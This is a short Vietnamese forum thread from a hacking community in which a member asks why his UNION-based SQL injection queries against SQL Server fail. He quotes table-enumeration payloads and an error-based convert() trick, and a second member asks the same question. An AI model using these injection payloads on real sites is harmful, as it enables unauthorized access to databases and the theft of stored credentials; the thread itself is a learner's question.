English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Hỏi về hàm Union trong SQL Injection  XML
  [Question]   Hỏi về hàm Union trong SQL Injection 09/12/2008 14:16:33 (+0700) | #1 | 161798
[Avatar]
 phstiger
Member
[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
CSDL của em như sau: có 2 table news và users
Table news:
id : int
theloai : int
tieude : text
tomtat : text
noidung : text

Table users gồm tkusername và tkpassword kiểu text
Nhưng em có thắc mắc như sau:
Đối với SQL Server khi chạy câu truy vấn
select theloai from news where id=5 union select table_name from information_schema.tables -- and theloai=2
 

Kết quả trả về là
Syntax error converting the nvarchar value 'users' to a column of data type int.  

Ở đây theo em hiểu là 2 trường ở 2 câu select bằng nhau (do cú pháp union) ,kết quả câu select thứ nhất giá trị kiểu int, còn câu select thứ 2 trả về kiểu text nên phát sinh lỗi.
Nhưng em nghĩ trong thực tế đâu có dùng câu select 1 trường ra như vậy. Giả sử họ dùng
select * from news where id=5
select id,tieude,noidung from news where id=5 <br> .... 

Theo như trong bài viết tại /hvaonline/posts/list/163.html
Em thấy dòng

http://vịtcon/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--  

có phải câu select sẽ là
SELECT * FROM product WHERE id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--  

như trong hướng dẫn hay không? (Vì em test thử ko thành công)
Như vậy thì câu select có nhiều hơn 1 trường và có lẫn lộn kiểu int và text thì hàm union có lấy được thông tin hay không. Vì em đã thử với
select id,tomtat from news where theloai=2 union select top 1 table_name,table_name from ìnormation_schema.tables 

Nhưng không có kết quả....
Em có nghĩ đến dùng
and 1=convert(int,(câu select))
nhưng em tìm không thấy trong bài hướng dẫn ở link trên, nên có một số thắc mắc.
Mong các bạn giúp đỡ.
Thanks


[Up] [Print Copy]
  [Question]   Hỏi về hàm Union trong SQL Injection 12/10/2010 07:04:39 (+0700) | #2 | 222645
kyyu
Member
[Minus]    0    [Plus]
Joined: 08/04/2010 06:10:41
Messages: 5
Offline
[Profile] [PM]
em cũng có ý kiến như anh phstiger, help me!
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|